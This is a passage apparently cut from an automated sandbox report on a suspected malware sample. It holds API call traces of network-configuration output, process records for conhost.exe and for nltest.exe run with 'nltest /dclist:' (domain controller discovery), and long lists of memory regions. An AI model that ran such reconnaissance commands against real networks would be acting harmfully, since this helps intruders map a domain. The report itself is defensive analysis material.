(HeapHandle=0x470000, Flags=0x0, Size=0x54) returned 0x47fda0 [0124.147] _vsnwprintf (in: _Buffer=0x47fda0, _BufferCount=0x29, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fda6, _BufferCount=0x26, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="01-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdac, _BufferCount=0x23, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdb2, _BufferCount=0x20, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="01-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdb8, _BufferCount=0x1d, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="28-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdbe, _BufferCount=0x1a, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="B6-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdc4, _BufferCount=0x17, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="28-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdca, _BufferCount=0x14, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="5E-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdd0, _BufferCount=0x11, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdd6, _BufferCount=0xe, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="0F-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fddc, _BufferCount=0xb, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="F3-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fde2, _BufferCount=0x8, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="E1-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fde8, _BufferCount=0x5, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="61-") returned 3 [0124.147] _vsnwprintf (in: _Buffer=0x47fdee, _BufferCount=0x2, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="38㈣਍") returned -1 [0124.147] __iob_func () returned 0x7ffe97fce210 [0124.147] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a30, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x52 [0124.147] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.147] _fileno (_File=0x7ffe97fce240) returned 1 [0124.147] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.147] GetFileType (hFile=0x61c) returned 0x1 [0124.147] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0124.148] LocalAlloc (uFlags=0x40, uBytes=0x53) returned 0x47ff20 [0124.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", cchWideChar=-1, lpMultiByteStr=0x47ff20, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", lpUsedDefaultChar=0x0) returned 83 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _write (in: _FileHandle=1, _Buf=0x47ff20*, _MaxCharCount=0x52 | out: _Buf=0x47ff20*) returned 82 [0124.148] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.148] LocalFree (hMem=0x47ff20) returned 0x0 [0124.148] LocalFree (hMem=0x47bb80) returned 0x0 [0124.148] GetProcessHeap () returned 0x470000 [0124.148] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47fda0) returned 1 [0124.148] __iob_func () returned 0x7ffe97fce210 [0124.148] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x279c, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x31 [0124.148] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.148] GetFileType (hFile=0x61c) returned 0x1 [0124.148] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0124.148] LocalAlloc (uFlags=0x40, uBytes=0x32) returned 0x4897a0 [0124.148] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", cchWideChar=-1, lpMultiByteStr=0x4897a0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", lpUsedDefaultChar=0x0) returned 50 [0124.148] _fileno (_File=0x7ffe97fce240) returned 1 [0124.148] _write (in: _FileHandle=1, _Buf=0x4897a0*, _MaxCharCount=0x31 | out: _Buf=0x4897a0*) returned 49 [0124.149] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.149] _fileno (_File=0x7ffe97fce240) returned 1 [0124.149] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.149] LocalFree (hMem=0x4897a0) returned 0x0 [0124.149] LocalFree (hMem=0x47bb80) returned 0x0 [0124.149] LocalFree (hMem=0x4839b0) returned 0x0 [0124.149] exit (_Code=0) Thread: id = 32 os_tid = 0x10ac Thread: id = 33 os_tid = 0x10b0 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x643b4000" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xc64" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1155 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1156 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1157 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1158 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1159 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1160 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1161 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1162 start_va = 0x7ff7bb770000 end_va = 0x7ff7bb780fff monitored = 0 entry_point = 0x7ff7bb7716b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1163 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1164 start_va = 0x90000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1165 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1166 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1167 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1168 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1169 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1170 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1171 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1172 start_va = 0x4c0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1173 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1174 start_va = 0x7ffe8bec0000 end_va = 0x7ffe8bf18fff monitored = 0 entry_point = 0x7ffe8becfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1175 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1176 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1177 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1178 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1179 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1180 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1181 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1182 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1183 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1184 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1185 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1186 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1187 start_va = 0x7ffe92c00000 end_va = 0x7ffe92d85fff monitored = 0 entry_point = 0x7ffe92c4d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1188 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1189 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1190 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1191 start_va = 0x610000 end_va = 0x797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1192 start_va = 0x7a0000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1193 start_va = 0x930000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1194 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1195 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1196 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1197 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1198 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1199 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1200 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1201 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1202 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1203 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1204 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1205 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1206 start_va = 0x550000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1207 start_va = 0x1d30000 end_va = 0x2066fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1208 start_va = 0x2070000 end_va = 0x2284fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1209 start_va = 0x2290000 end_va = 0x24aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 1210 start_va = 0x24b0000 end_va = 0x25c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1211 start_va = 0x25d0000 end_va = 0x27e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 1212 start_va = 0x27f0000 end_va = 0x2907fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Thread: id = 29 os_tid = 0xc74 Thread: id = 30 os_tid = 0xc78 Thread: id = 31 os_tid = 0xc84 Process: id = "8" image_name = "nltest.exe" filename = "c:\\windows\\system32\\nltest.exe" page_root = "0x810000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xde0" cmd_line = "nltest /dclist:" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1231 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1232 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1233 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1234 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1235 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1236 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1237 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1238 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1239 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1240 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1241 start_va = 0x7ff7a2170000 end_va = 0x7ff7a21f4fff monitored = 0 entry_point = 0x7ff7a2178970 region_type = mapped_file name = "nltest.exe" filename = "\\Windows\\System32\\nltest.exe" (normalized: "c:\\windows\\system32\\nltest.exe") Region: id = 1242 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1243 start_va = 0x400000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1244 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1245 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1246 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1247 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1248 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1307 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1308 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1309 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1310 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1311 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1312 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1313 start_va = 0x7ffe95be0000 end_va = 0x7ffe95c4afff monitored = 0 entry_point = 0x7ffe95bf90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1314 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1315 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1316 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1317 start_va = 0x7ffe90690000 end_va = 0x7ffe906cdfff monitored = 0 entry_point = 0x7ffe9069a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1318 start_va = 0x7ffe8d6d0000 end_va = 0x7ffe8d6f7fff monitored = 0 entry_point = 0x7ffe8d6d4a80 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1319 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1320 start_va = 0x7ffe93a10000 end_va = 0x7ffe93a1bfff monitored = 0 entry_point = 0x7ffe93a127e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1321 start_va = 0x7ffe93f80000 end_va = 0x7ffe93f96fff monitored = 0 entry_point = 0x7ffe93f879d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1322 start_va = 0x620000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1323 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1324 start_va = 0x620000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1325 start_va = 0x7b0000 end_va = 0x7e8fff monitored = 0 entry_point = 0x7b12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1326 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1327 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1328 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1329 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1330 start_va = 0x1d0000 end_va = 0x1d5fff monitored = 0 